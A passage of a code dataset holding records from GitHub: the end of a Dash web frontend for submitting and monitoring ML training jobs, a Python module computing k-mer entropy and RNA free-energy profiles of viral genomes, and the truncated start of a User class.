Input(\"import-dir\", \"n_clicks\"),\n State(\"collapse\", \"is_open\")\n)\ndef toggle_collapse(collapse_button, import_button, is_open):\n '''\n This callback toggles the file manager\n Args:\n collapse_button: \"Open File Manager\" button\n import_button: Import button\n is_open: Open/close File Manager modal state\n '''\n if collapse_button or import_button:\n return not is_open\n return is_open\n\n\n@app.callback(\n Output(\"warning-modal\", \"is_open\"),\n Output(\"warning-msg\", \"children\"),\n 
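# 'warning-cause' is a dcc.Store declared in the sidebar; other callbacks\n # (e.g. execute) write a cause string into it to pop this modal open.\n 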
Input(\"warning-cause\", \"data\"),\n Input(\"ok-button\", \"n_clicks\"),\n State(\"warning-modal\", \"is_open\"),\n prevent_initial_call=True\n)\ndef toggle_warning_modal(warning_cause, ok_n_clicks, is_open):\n '''\n This callback toggles a warning/error message\n Args:\n warning_cause: Cause that triggered the warning\n ok_n_clicks: Close the warning\n is_open: Close/open state of the warning\n '''\n changed_id = dash.callback_context.triggered[0]['prop_id']\n if 'ok-button.n_clicks' in changed_id:\n return not is_open, \"\"\n if warning_cause == 'wrong_dataset':\n return not is_open, \"The dataset you have selected is not supported. Please select (1) a data directory \" \\\n \"where each subfolder corresponds to a given category, OR (2) an NPZ file.\"\n if warning_cause == 'different_size':\n return not is_open, \"The number of images and labels do not match. Please select a different dataset.\"\n if warning_cause == 'no_row_selected':\n return not is_open, \"Please select a trained model from the List of Jobs\"\n if warning_cause == 'no_dataset':\n return not is_open, \"Please upload the dataset before submitting the job.\"\n else:\n return False, \"\"\n\n\n@app.callback(\n Output(\"modal\", \"is_open\"),\n Input(\"delete-files\", \"n_clicks\"),\n Input(\"confirm-delete\", \"n_clicks\"),\n State(\"modal\", \"is_open\")\n)\ndef toggle_modal(n1, n2, is_open):\n '''\n This callback toggles a confirmation message for file manager\n Args:\n n1: Delete files button\n n2: Confirm delete button\n is_open: Open/close confirmation modal state\n '''\n if n1 or n2:\n return not is_open\n return is_open\n\n\n@app.callback(\n Output(\"npz-modal\", \"is_open\"),\n Output(\"npz-img-key\", \"options\"),\n\n Input(\"import-dir\", \"n_clicks\"),\n Input(\"confirm-import\", \"n_clicks\"),\n Input(\"npz-img-key\", \"value\"),\n State(\"npz-modal\", \"is_open\"),\n State(\"docker-file-paths\", \"data\"),\n)\ndef toggle_modal_keyword(import_button, confirm_import, img_key, is_open, npz_path):\n '''\n This callback opens the modal to select the keywords within the NPZ file. 
When a keyword is selected for images or\n labels, this option is removed from the options of the other.\n Args:\n import_button: Import button\n confirm_import: Confirm import button\n img_key: Selected keyword for the images\n is_open: Open/close status of the modal\n npz_path: Path to NPZ file\n Returns:\n toggle_modal: Open/close modal\n img_options: Keyword options for images\n '''\n img_options = []\n toggle_modal = is_open\n changed_id = dash.callback_context.triggered[0]['prop_id']\n if npz_path:\n if npz_path[0].split('.')[-1] == 'npz':\n data = np.load(npz_path[0])\n img_key_list = list(data.keys())\n df_img = pd.DataFrame({'c': img_key_list})\n img_options = [{'label':i, 'value':i} for i in df_img['c']]\n toggle_modal = True\n if is_open and 'confirm-import.n_clicks' in changed_id:\n toggle_modal = False\n return toggle_modal, img_options\n\n\n@app.callback(\n Output('dummy-data', 'data'),\n Input('dash-uploader', 'isCompleted'),\n State('dash-uploader', 'fileNames')\n)\ndef upload_zip(iscompleted, upload_filename):\n '''\n This callback uploads a ZIP file\n Args:\n iscompleted: The upload operation is completed (bool)\n upload_filename: Filename of the uploaded content\n '''\n if not iscompleted:\n return 0\n if upload_filename is not None:\n path_to_zip_file = pathlib.Path(UPLOAD_FOLDER_ROOT) / upload_filename[0]\n if upload_filename[0].split('.')[-1] == 'zip': # unzip files and delete zip file\n zip_ref = zipfile.ZipFile(path_to_zip_file) # create zipfile object\n path_to_folder = pathlib.Path(UPLOAD_FOLDER_ROOT) / upload_filename[0].split('.')[-2]\n if (upload_filename[0].split('.')[-2] + '/') in zip_ref.namelist():\n zip_ref.extractall(pathlib.Path(UPLOAD_FOLDER_ROOT)) # extract file to dir\n else:\n zip_ref.extractall(path_to_folder)\n zip_ref.close() # close file\n os.remove(path_to_zip_file)\n return 0\n\n\n@app.callback(\n Output('files-table', 'data'),\n Output('docker-file-paths', 'data'),\n Output('data-path', 'data'),\n\n Input('browse-format', 'value'),\n Input('browse-dir', 'n_clicks'),\n Input('import-dir', 'n_clicks'),\n Input('confirm-delete', 'n_clicks'),\n Input('move-dir', 'n_clicks'),\n Input('files-table', 'selected_rows'),\n Input('data-path', 'data'),\n Input('import-format', 'value'),\n Input('my-toggle-switch', 'value'),\n Input('jobs-table', 'selected_rows'),\n Input(\"clear-data\", \"n_clicks\"),\n Input(\"refresh-data\", \"n_clicks\"),\n\n State('dest-dir-name', 'value'),\n State('jobs-table', 'data')\n)\ndef file_manager(browse_format, browse_n_clicks, import_n_clicks, delete_n_clicks, move_dir_n_clicks, rows,\n selected_paths, import_format, docker_path, job_rows, clear_data, refresh_data, dest, job_data):\n '''\n This callback displays manages the actions of file manager\n Args:\n browse_format: File extension to browse\n browse_n_clicks: Browse button\n import_n_clicks: Import button\n delete_n_clicks: Delete button\n move_dir_n_clicks: Move button\n rows: Selected rows\n selected_paths: Selected paths in cache\n import_format: File extension to import\n docker_path: [bool] docker vs local path\n job_rows: Selected rows in job table. If it's not a \"training\" model, it will load its results\n instead of the data uploaded through File Manager. 
This is so that the user can observe\n previous evaluation results\n dest: Destination path\n job_data: Data in job table\n clear_data: Clear the loaded images\n refresh_data: Refresh the loaded images\n Returns\n files: Filenames to be displayed in File Manager according to browse_format from docker/local path\n list_filename: List of selected filenames in the directory AND SUBDIRECTORIES FROM DOCKER PATH\n selected_files: List of selected filename FROM DOCKER PATH (no subdirectories)\n selected_row: Selected row in jobs table\n '''\n start = time.time()\n changed_id = dash.callback_context.triggered[0]['prop_id']\n\n supported_formats = []\n import_format = import_format.split(',')\n if import_format[0] == '*':\n supported_formats = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\n else:\n for ext in import_format:\n supported_formats.append(ext.split('.')[1])\n\n files = []\n if browse_n_clicks or import_n_clicks:\n files = filename_list(DOCKER_DATA, browse_format)\n\n selected_files = []\n list_filename = []\n if bool(rows):\n for row in rows:\n file_path = files[row]\n selected_files.append(file_path)\n if file_path['file_type'] == 'dir':\n list_filename = add_paths_from_dir(file_path['file_path'], supported_formats, list_filename)\n else:\n list_filename.append(file_path['file_path'])\n\n if browse_n_clicks and changed_id == 'confirm-delete.n_clicks':\n for filepath in selected_files:\n if os.path.isdir(filepath['file_path']):\n shutil.rmtree(filepath['file_path'])\n else:\n os.remove(filepath['file_path'])\n selected_files = []\n files = filename_list(DOCKER_DATA, browse_format)\n\n if browse_n_clicks and changed_id == 'move-dir.n_clicks':\n if dest is None:\n dest = ''\n destination = DOCKER_DATA / dest\n destination.mkdir(parents=True, exist_ok=True)\n if bool(rows):\n sources = selected_paths\n for source in sources:\n if os.path.isdir(source['file_path']):\n move_dir(source['file_path'], str(destination))\n shutil.rmtree(source['file_path'])\n else:\n move_a_file(source['file_path'], str(destination))\n selected_files = []\n files = filename_list(DOCKER_DATA, browse_format)\n if not docker_path:\n files = docker_to_local_path(files, DOCKER_HOME, LOCAL_HOME)\n print(f'file manager callback {time.time()-start}')\n if changed_id == 'refresh-data.n_clicks':\n list_filename, selected_files = [], []\n datapath = requests.get(f'http://labelmaker-api:8005/api/v0/datapath/import_dataset').json()\n if datapath:\n if bool(datapath['datapath']) and os.path.isdir(datapath['datapath']['file_path'][0]):\n list_filename, selected_files = datapath['filenames'], datapath['datapath']['file_path'][0]\n return files, list_filename, selected_files\n \n elif changed_id == 'import-dir.n_clicks':\n return files, list_filename, selected_files\n \n elif changed_id == 'clear-data.n_clicks':\n return [], [], []\n \n else:\n return files, dash.no_update, dash.no_update\n\n\n##### DATA CLINIC CALLBACKS ####\n@app.callback(\n Output('app-parameters', 'children'),\n Input('model-selection', 'value'),\n Input('action', 'value')\n)\ndef load_parameters_and_content(model_selection, action_selection):\n '''\n This callback dynamically populates the parameters and contents of the website according to the selected action &\n model.\n Args:\n model_selection: Selected model (from content registry)\n action_selection: Selected action (pre-defined actions in Data Clinic)\n Returns:\n app-parameters: Parameters according to the selected model & action\n '''\n parameters = get_gui_components(model_selection, action_selection)\n 
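# Build the parameter editor from the JSON schema returned for this\n # model/action pair, then wire its pattern-matching callbacks to the app.\n 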
gui_item = JSONParameterEditor(_id={'type': 'parameter_editor'}, # pattern match _id (base id), name\n json_blob=parameters,\n )\n gui_item.init_callbacks(app)\n return gui_item\n\n\n@app.callback(\n Output('orig_img', 'src'),\n Output('rec_img', 'src'),\n Output('ls_graph', 'src'),\n Output('img-slider', 'max'),\n Output('img-slider', 'value'),\n Output('data-size-out', 'children'),\n Output('current-image-label', 'children'),\n\n Input('import-dir', 'n_clicks'),\n Input('confirm-import', 'n_clicks'),\n Input({'type': ALL, 'param_key': 'latent_dim', 'name': 'latent_dim', 'layer': 'input'}, 'value'),\n Input({'type': ALL, 'param_key': 'target_width', 'name': 'target_width'}, 'value'),\n Input({'type': ALL, 'param_key': 'target_height', 'name': 'target_height'}, 'value'),\n Input('img-slider', 'value'),\n Input('action', 'value'),\n Input('jobs-table', 'selected_rows'),\n Input('jobs-table', 'data'),\n Input(\"docker-file-paths\", \"data\"),\n \n State(\"npz-img-key\", \"value\"),\n State(\"npz-modal\", \"is_open\"),\n)\ndef refresh_image(import_dir, confirm_import, ls_var, target_width, target_height, img_ind, action_selection, row,\n data_table, filenames, img_keyword, npz_modal):\n '''\n This callback updates the images in the display\n Args:\n import_dir: Import button\n confirm_import: Confirm import button\n ls_var: Latent space value\n target_width: Target data width (if resizing)\n target_height: Target data height (if resizing)\n img_ind: Index of image according to the slider value\n row: Selected job (model) \n data_table: Data in table of jobs\n filenames: Selected data files\n img_keyword: Keyword for images in NPZ file\n npz_modal: Open/close status of NPZ modal\n action_selection: Action selection (train vs test)\n Returns:\n img-output: Output figure\n img-reconst-output: Reconstructed output (if prediction is selected, ow. 
blank image)\n latent-space-plot: Graphical representation of latent space definition\n img-slider-max: Maximum value of the slider according to the dataset (train vs test)\n img-slider-value: Value of the slider according to the dataset length\n data-size-out: Size of uploaded data\n '''\n start = time.time()\n current_im_label = ''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n print(f'changed id: {changed_id}')\n if action_selection in ['train_model', 'transfer_learning']:\n if len(ls_var) > 0:\n ls_var = int(ls_var[0])\n target_width = int(target_width[0])\n target_height = int(target_height[0])\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n else:\n ls_plot = dash.no_update\n else:\n ls_plot = get_bottleneck(1, 1, 1, False)\n target_width = None\n if row:\n if row[0] < len(data_table):\n if data_table[row[0]]['job_type'].split()[0] == 'train_model':\n if action_selection == 'prediction_model':\n train_params = str_to_dict(data_table[row[0]]['parameters'])\n ls_var = int(train_params['latent_dim'])\n target_width = int(train_params['target_width'])\n target_height = int(train_params['target_height'])\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n else:\n supported_formats = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\n filenames = add_paths_from_dir(data_table[row[0]]['dataset'], supported_formats, [])\n job_id = data_table[row[0]]['experiment_id']\n reconstructed_path = 'data/mlexchange_store/{}/{}/'.format(USER, job_id)\n #reconstructed_path = 'data/mlexchange_store/{}/{}/reconstructed_images.npy'.format(USER, job_id)\n try:\n slider_max = len(filenames)\n img_ind = min(slider_max, img_ind)\n reconst_img= Image.open(f'{reconstructed_path}{img_ind}.jpg')\n #reconstructed_data = np.load(reconstructed_path)\n #slider_max = reconstructed_data.shape[0]\n #img_ind = min(slider_max, img_ind)\n #reconst_img = Image.fromarray((np.squeeze((reconstructed_data[img_ind] -\n # np.min(reconstructed_data[img_ind])) * 255)).astype(np.uint8))\n except Exception:\n print('Reconstructed images are not ready')\n indx = data_table[row[0]]['parameters'].find('Training Parameters:')\n train_params = str_to_dict(data_table[row[0]]['parameters'][indx + 21:])\n ls_var = int(train_params['latent_dim'])\n target_width = int(train_params['target_width'])\n target_height = int(train_params['target_height'])\n if 'img-slider.value' in changed_id:\n ls_plot = dash.no_update\n else:\n ls_plot = get_bottleneck(ls_var, target_width, target_height)\n\n if len(filenames) > 0:\n try:\n if filenames[0].split('.')[-1] == 'npz': # npz file\n if img_keyword is not None:\n current_im_label = filenames[0]\n data_npz = np.load(filenames[0])\n data_npy = np.squeeze(data_npz[img_keyword])\n slider_max = len(data_npy) - 1\n img_ind = min(slider_max, img_ind)\n origimg = data_npy[img_ind]\n else: # directory\n slider_max = len(filenames) - 1\n if img_ind > slider_max:\n img_ind = 0\n origimg = Image.open(filenames[img_ind])\n current_im_label = filenames[img_ind]\n except Exception as e:\n print(f'Exception in refresh_image callback {e}')\n if 'origimg' not in locals():\n origimg = Image.fromarray((np.zeros((32,32)).astype(np.uint8)))\n slider_max = 0\n (width, height) = origimg.size\n if 'reconst_img' not in locals():\n reconst_img = Image.fromarray((np.zeros(origimg.size).astype(np.uint8)))\n if target_width:\n origimg = plot_figure(origimg.resize((target_width, target_height)))\n recimg = plot_figure(reconst_img.resize((target_width, target_height)))\n data_size = 
'Original Image: (' + str(width) + 'x' + str(height) + '). Resized Image: (' + \\\n str(target_width) + 'x' + str(target_height) + ').'\n else:\n origimg = plot_figure(origimg)\n recimg = plot_figure(reconst_img)\n data_size = 'Original Image: (' + str(width) + 'x' + str(height) + \\\n '). Choose a trained model to update the graph.'\n print(f'Time in callback {time.time()-start}')\n return origimg, recimg, ls_plot, slider_max, img_ind, data_size, 'Image: '+current_im_label\n\n\n@app.callback(\n Output('jobs-table', 'data'),\n Output('loss-plot', 'figure'),\n Output('show-plot', 'is_open'),\n Output('log-modal', 'is_open'),\n Output('log-display', 'children'),\n Output('jobs-table', 'active_cell'),\n\n Input('interval', 'n_intervals'),\n Input('jobs-table', 'selected_rows'),\n Input('jobs-table', 'active_cell'),\n Input('modal-close', 'n_clicks'),\n\n State('jobs-table', 'data'),\n State('loss-plot', 'figure'),\n prevent_initial_call=True\n)\ndef update_table(n, row, active_cell, close_clicks, current_job_table, current_fig):\n '''\n This callback updates the job table, loss plot, and results according to the job status in the compute service.\n Args:\n n: Time intervals that triggers this callback\n row: Selected row (job)\n active_cell: Selected cell in table of jobs\n close_clicks: Close pop-up window\n current_job_table: Current job table\n current_fig: Current loss plot\n Returns:\n jobs-table: Updates the job table\n loss-plot: Updates the loss plot according to the job status (logs)\n show-plot: Shows/hides the loss plot\n log-modal: Open/close pop-up window\n log-display: Contents of pop-up window\n jobs-table: Selects/deselects the active cell in job table. Without this output, the pop-up window will not\n close\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'modal-close.n_clicks' in changed_id:\n return dash.no_update, dash.no_update, dash.no_update, False, dash.no_update, None\n job_list = get_job(USER, 'data_clinic')\n data_table = []\n if job_list is not None:\n for job in job_list:\n params = str(job['job_kwargs']['kwargs']['params'])\n if job['job_kwargs']['kwargs']['job_type'].split()[0] != 'train_model':\n params = params + '\\nTraining Parameters: ' + str(job['job_kwargs']['kwargs']['train_params'])\n data_table.insert(0,\n dict(\n job_id=job['uid'],\n name=job['description'],\n job_type=job['job_kwargs']['kwargs']['job_type'],\n status=job['status']['state'],\n parameters=params,\n experiment_id=job['job_kwargs']['kwargs']['experiment_id'],\n dataset=job['job_kwargs']['kwargs']['dataset'],\n job_logs=job['logs'])\n )\n is_open = dash.no_update\n log_display = dash.no_update\n if active_cell:\n row_log = active_cell[\"row\"]\n col_log = active_cell[\"column_id\"]\n if col_log == 'job_logs': # show job logs\n is_open = True\n log_display = dcc.Textarea(value=data_table[row_log][\"job_logs\"],\n style={'width': '100%', 'height': '30rem', 'font-family':'monospace'})\n if col_log == 'parameters': # show job parameters\n is_open = True\n log_display = dcc.Textarea(value=data_table[row_log][\"parameters\"],\n style={'width': '100%', 'height': '30rem', 'font-family': 'monospace'})\n fig = go.Figure(go.Scatter(x=[], y=[]))\n show_plot = False\n if row:\n if row[0] < len(data_table):\n log = data_table[row[0]][\"job_logs\"]\n if log:\n if data_table[row[0]]['job_type'].split()[0] == 'train_model':\n start = log.find('epoch')\n if start > -1 and len(log) > start + 25:\n try:\n fig = generate_loss_plot(log, start)\n show_plot = True\n except 
Exception as e:\n print(f'Loss plot exception {e}')\n if current_fig:\n #if len(fig['data'])>0:\n try:\n if current_fig['data'][0]['x'] == list(fig['data'][0]['x']):\n fig = dash.no_update\n except Exception as e:\n print(e)\n if data_table == current_job_table:\n data_table = dash.no_update\n return data_table, fig, show_plot, is_open, log_display, None\n\n\n@app.callback(\n Output('jobs-table', 'selected_rows'),\n Input('deselect-row', 'n_clicks'),\n prevent_initial_call=True\n)\ndef deselect_row(n_click):\n '''\n This callback deselects the row in the data table\n '''\n return []\n\n\n@app.callback(\n Output('delete-modal', 'is_open'),\n Input('confirm-delete-row', 'n_clicks'),\n Input('delete-row', 'n_clicks'),\n Input('stop-row', 'n_clicks'),\n State('jobs-table', 'selected_rows'),\n State('jobs-table', 'data'),\n prevent_initial_call=True\n)\ndef delete_row(confirm_delete, delete, stop, row, job_data):\n '''\n This callback deletes or terminates the selected job in the table\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'delete-row.n_clicks' == changed_id:\n return True\n elif 'stop-row.n_clicks' == changed_id:\n job_uid = job_data[row[0]]['job_id']\n requests.patch(f'http://job-service:8080/api/v0/jobs/{job_uid}/terminate')\n return False\n else:\n job_uid = job_data[row[0]]['job_id']\n requests.delete(f'http://job-service:8080/api/v0/jobs/{job_uid}/delete')\n return False\n\n\n@app.callback(\n Output('resources-setup', 'is_open'),\n Output('counters', 'data'),\n Output(\"warning-cause\", \"data\"),\n\n Input('execute', 'n_clicks'),\n Input('submit', 'n_clicks'),\n\n State('app-parameters', 'children'),\n State('num-cpus', 'value'),\n State('num-gpus', 'value'),\n State('action', 'value'),\n State('jobs-table', 'data'),\n State('jobs-table', 'selected_rows'),\n State('data-path', 'data'),\n State(\"docker-file-paths\", \"data\"),\n State(\"counters\", \"data\"),\n State(\"npz-img-key\", \"value\"),\n State(\"model-name\", \"value\"),\n prevent_initial_call=True)\ndef execute(execute, submit, children, num_cpus, num_gpus, action_selection, job_data, row, data_path, filenames,\n counters, x_key, model_name):\n '''\n This callback submits a job request to the compute service according to the selected action & model\n Args:\n execute: Execute button\n submit: Submit button\n children: Model parameters\n num_cpus: Number of CPUs assigned to job\n num_gpus: Number of GPUs assigned to job\n action_selection: Action selected\n job_data: Lists of jobs\n row: Selected row (job)\n data_path: Local path to data\n counters: List of counters to assign a number to each job according to its action (train vs evaluate)\n filenames: List of filenames within this dataset\n x_key: Keyword for x data in NPZ file\n model_name: User-defined job name (a default name is generated from the action and counter if left empty)\n Returns:\n open/close the resources setup modal\n '''\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n if 'execute.n_clicks' in changed_id:\n if len(filenames) == 0:\n return False, counters, 'no_dataset'\n if action_selection != 'train_model' and not row:\n return False, counters, 'no_row_selected'\n if row:\n if action_selection != 'train_model' and job_data[row[0]]['job_type'].split()[0] != 'train_model':\n return False, counters, 'no_row_selected'\n return True, counters, ''\n if 'submit.n_clicks' in changed_id:\n counters = get_counter(USER)\n experiment_id = str(uuid.uuid4())\n out_path = pathlib.Path('data/mlexchange_store/{}/{}'.format(USER, experiment_id))\n out_path.mkdir(parents=True, exist_ok=True)\n input_params = {'data_key': 
x_key}\n if bool(children):\n for child in children['props']['children']:\n key = child[\"props\"][\"children\"][1][\"props\"][\"id\"][\"param_key\"]\n value = child[\"props\"][\"children\"][1][\"props\"][\"value\"]\n input_params[key] = value\n try:\n data_path = data_path[0]['file_path']\n except Exception as e:\n print(e)\n json_dict = input_params\n kwargs = {}\n if action_selection == 'train_model':\n counters[0] = counters[0] + 1\n count = counters[0]\n command = \"python3 src/train_model.py\"\n directories = [data_path, str(out_path)]\n else:\n counters[1] = counters[1] + 1\n count = counters[1]\n training_exp_id = job_data[row[0]]['experiment_id']\n in_path = pathlib.Path('data/mlexchange_store/{}/{}'.format(USER, training_exp_id))\n kwargs = {'train_params': job_data[row[0]]['parameters']}\n train_params = str_to_dict(job_data[row[0]]['parameters'])\n json_dict['target_width'] = train_params['target_width']\n json_dict['target_height'] = train_params['target_height']\n if action_selection == 'prediction_model':\n command = \"python3 src/predict_model.py\"\n directories = [data_path, str(in_path) , str(out_path)]\n if len(model_name)==0: # if model_name was not defined\n model_name = f'{action_selection} {count}'\n job = SimpleJob(service_type='backend',\n description=model_name,\n working_directory='{}'.format(DATA_DIR),\n uri='mlexchange1/unsupervised-classifier',\n cmd= ' '.join([command] + directories + ['\\''+json.dumps(json_dict)+'\\'']),\n kwargs = {'job_type': action_selection,\n 'experiment_id': experiment_id,\n 'dataset': data_path,\n 'params': json_dict,\n **kwargs})\n job.submit(USER, num_cpus, num_gpus)\n return False, counters, ''\n return False, counters, ''\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, host='0.0.0.0', port=8072)\n","repo_name":"mlexchange/mlex_data_clinic","sub_path":"src/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":39978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71120604257","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport re\nfrom Bio import SeqIO, Phylo\nimport math\nfrom Bio.Seq import Seq\nimport random\nimport scipy.stats as stats\nimport statsmodels.stats.multitest as multi\nimport RNA\nfrom random import sample\nimport glob\nfrom functools import reduce\n\n# k-mers distribution based entropy measures.\ndef entropy_by_kmer(seq, k):\n \"\"\"\n calculate the entropy of a sequence according to its k-mers\n :param seq: a genome string\n :param k: size of the k-mer to use\n :return: entropy\n \"\"\"\n\n # update kmers\n kmers = {}\n for i in range(len(seq) - k):\n kmer = seq[i:i+k]\n if kmer in kmers:\n kmers[kmer] += 1\n else:\n kmers[kmer] = 1\n\n # calculate entropy\n total_kmers = sum(kmers.values())\n entropy = 0\n for kmer in kmers:\n p = kmers[kmer] / total_kmers\n entropy += -(p * math.log2(p))\n\n return entropy\n\ndef joint_entropy (seq1, seq2, k):\n \"\"\"\n calculates the joint entropy of two sequences.\n :param seq1: sequence #1\n :param seq2: sequence #2\n :param k: k-mer length\n :return: joint entropy value\n \"\"\"\n\n kmers_1 = {}\n kmers_2 = {}\n\n # kmers in sequence #1\n for i in range(len(seq1) - k):\n kmer = seq1[i:i+k]\n if kmer in kmers_1:\n kmers_1[kmer] += 1\n else:\n kmers_1[kmer] = 1\n\n for i in range(len(seq2) - k):\n kmer = seq2[i:i+k]\n if kmer in kmers_2:\n kmers_2[kmer] += 1\n else:\n kmers_2[kmer] = 1\n\n # calculate joint entropy\n total_kmers_1 = 
sum(kmers_1.values())\n total_kmers_2 = sum(kmers_2.values())\n\n total = total_kmers_1 + total_kmers_2\n\n # make the k-mer key spaces equal: pad k-mers missing from either dict with zero counts\n for kmer in kmers_1:\n if kmer not in kmers_2:\n kmers_2[kmer] = 0\n\n for kmer in kmers_2:\n if kmer not in kmers_1:\n kmers_1[kmer] = 0\n\n joint_entropy = 0\n for kmer1 in kmers_1:\n for kmer2 in kmers_2:\n p_xy = (kmers_1[kmer1] + kmers_2[kmer2]) / total\n\n joint_entropy += -(p_xy * math.log2(p_xy))\n\n return joint_entropy\n\n\ndef information_storage (seq1, seq2, k):\n \"\"\"\n calculates the information storage of two sequences.\n :param seq1: sequence #1\n :param seq2: sequence #2\n :param k: k-mer length\n :return: information storage value\n \"\"\"\n\n kmers_1 = {}\n kmers_2 = {}\n\n # kmers in sequence #1\n for i in range(len(seq1) - k):\n kmer = seq1[i:i+k]\n if kmer in kmers_1:\n kmers_1[kmer] += 1\n else:\n kmers_1[kmer] = 1\n\n for i in range(len(seq2) - k):\n kmer = seq2[i:i+k]\n if kmer in kmers_2:\n kmers_2[kmer] += 1\n else:\n kmers_2[kmer] = 1\n\n # calculate joint entropy\n total_kmers_1 = sum(kmers_1.values())\n total_kmers_2 = sum(kmers_2.values())\n\n total = total_kmers_1 + total_kmers_2\n\n # make the k-mer key spaces equal: pad k-mers missing from either dict with zero counts\n for kmer in kmers_1:\n if kmer not in kmers_2:\n kmers_2[kmer] = 0\n\n for kmer in kmers_2:\n if kmer not in kmers_1:\n kmers_1[kmer] = 0\n\n inf_storage = 0\n for kmer1 in kmers_1:\n for kmer2 in kmers_2:\n\n p_xy = (kmers_1[kmer1] + kmers_2[kmer2]) / total\n p_x = kmers_1[kmer1] / total_kmers_1\n p_y = kmers_2[kmer2] / total_kmers_2\n\n if p_x == 0 or p_y == 0:\n continue\n inf_storage += p_xy * math.log2(p_xy/(p_x*p_y))\n\n return inf_storage\n\n\n\ndef get_reverse_complement(seq):\n \"\"\"\n get reverse complement genome\n :param seq: a genome sequence\n :return: a string of reverse complement\n \"\"\"\n seq = Seq(seq)\n reverse_complement = seq.reverse_complement()\n return reverse_complement\n\n\n\n# shuffle scrambler for a sequence.\ndef _scrambler(word):\n word_to_scramble = list(word)\n random.shuffle(word_to_scramble)\n new_word = ''.join(word_to_scramble)\n return new_word\n\ndef scrambler(word):\n new_word = _scrambler(word)\n while new_word == word and len(word) > 1:\n new_word = _scrambler(word)\n return new_word\n\n\n\n\n######## entropy profiles calculation ##################\ndef get_joint_entropy_profile(fasta, w, k=5, out=None, data_type='fasta'):\n \"\"\"\n sliding window entropy profile of all sequences in a family\n :param fasta: a fasta file containing viral sequences\n :param w: the window size\n :param out: optional. 
if not None, the profile is saved as a csv\n :return: a DataFrame of entropy profiles, one column per sequence\n \"\"\"\n all_entropies = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n entropies = []\n # get identifier and genomic sequence\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n rc_sub_genome = str(get_reverse_complement(sub_genome))\n entropy = joint_entropy(sub_genome, rc_sub_genome, k)\n entropies.append(entropy)\n\n\n all_entropies['seq_{}'.format(i)] = entropies\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_entropies.items()]))\n if out != None:\n df.to_csv(os.path.join(out, '{}_Joint_profile.csv'.format(alias)), index=False)\n\n return df\n\n\n\ndef get_entropy_profile(fasta, w, k=5, out=None, data_type='fasta'):\n \"\"\"\n sliding window entropy profile of all sequences in a family\n :param fasta: a fasta file containing viral sequences\n :param w: the window size\n :param out: optional. if not None, the profile is saved as a csv\n :return: a DataFrame of entropy profiles, one column per sequence\n \"\"\"\n all_entropies = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n entropies = []\n # get identifier and genomic sequence\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n entropy = entropy_by_kmer(sub_genome, k)\n entropies.append(entropy)\n\n\n\n all_entropies['seq_{}'.format(i)] = entropies\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_entropies.items()]))\n\n if out != None:\n df.to_csv(os.path.join(out, '{}_Shannon_profile.csv'.format(alias)), index=False)\n\n return df\n\ndef deltaG_calculator(seq):\n \"\"\"\n calculate the minimum free energy (G) for a given sequence\n :param seq: an rna sequence\n :return: minimum free energy\n \"\"\"\n ss, mfe = RNA.fold(seq)\n return mfe\n\ndef get_deltaG_profile(fasta, w, out=None, data_type='fasta'):\n\n \"\"\"\n sliding window free energy profile of all sequences in a family\n :param fasta: a fasta file containing viral sequences\n :param w: the window size\n :param out: optional. if not None, the profile is saved as a csv in this directory\n :return: a DataFrame of free energy profiles, one column per sequence\n \"\"\"\n all_deltaG = {}\n alias = os.path.basename(fasta).split('.')[0]\n\n i = 0\n for rec in tqdm(SeqIO.parse(fasta, data_type)):\n values = []\n\n genome = str(rec.seq)\n\n for j in range(len(genome) - w):\n sub_genome = genome[j:j+w]\n mfe = deltaG_calculator(sub_genome)\n values.append(mfe)\n\n\n all_deltaG['seq_{}'.format(i)] = values\n i += 1\n\n df = pd.DataFrame(dict([(k,pd.Series(v)) for k,v in all_deltaG.items()]))\n if out != None:\n df.to_csv(os.path.join(out, '{}_deltaG_profile.csv'.format(alias)), index=False)\n\n return df\n","repo_name":"daniellemiller/LabProjects","sub_path":"InformationEntropy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"40609704026","text":"class User(object):\n\tdef __init__(self, name, email):\n\t\tself.name = name\n\t\tself.email = email\n\t\tself.books = {}\n\n\tdef get_email(self):\n\t\treturn self.email\n\n\tdef change_email(self, address):\n\t\tself.email = address\n\t\tprint(\"The email address has successfully been changed to {0}.\".format(self.email))\n\n\tdef __repr__(self):\n\t\tif len(self.books) < 2:\n\t\t\treturn \"User {user}, email: {email}, has read {n} book.\".format(user=self.name, email=self.email, 
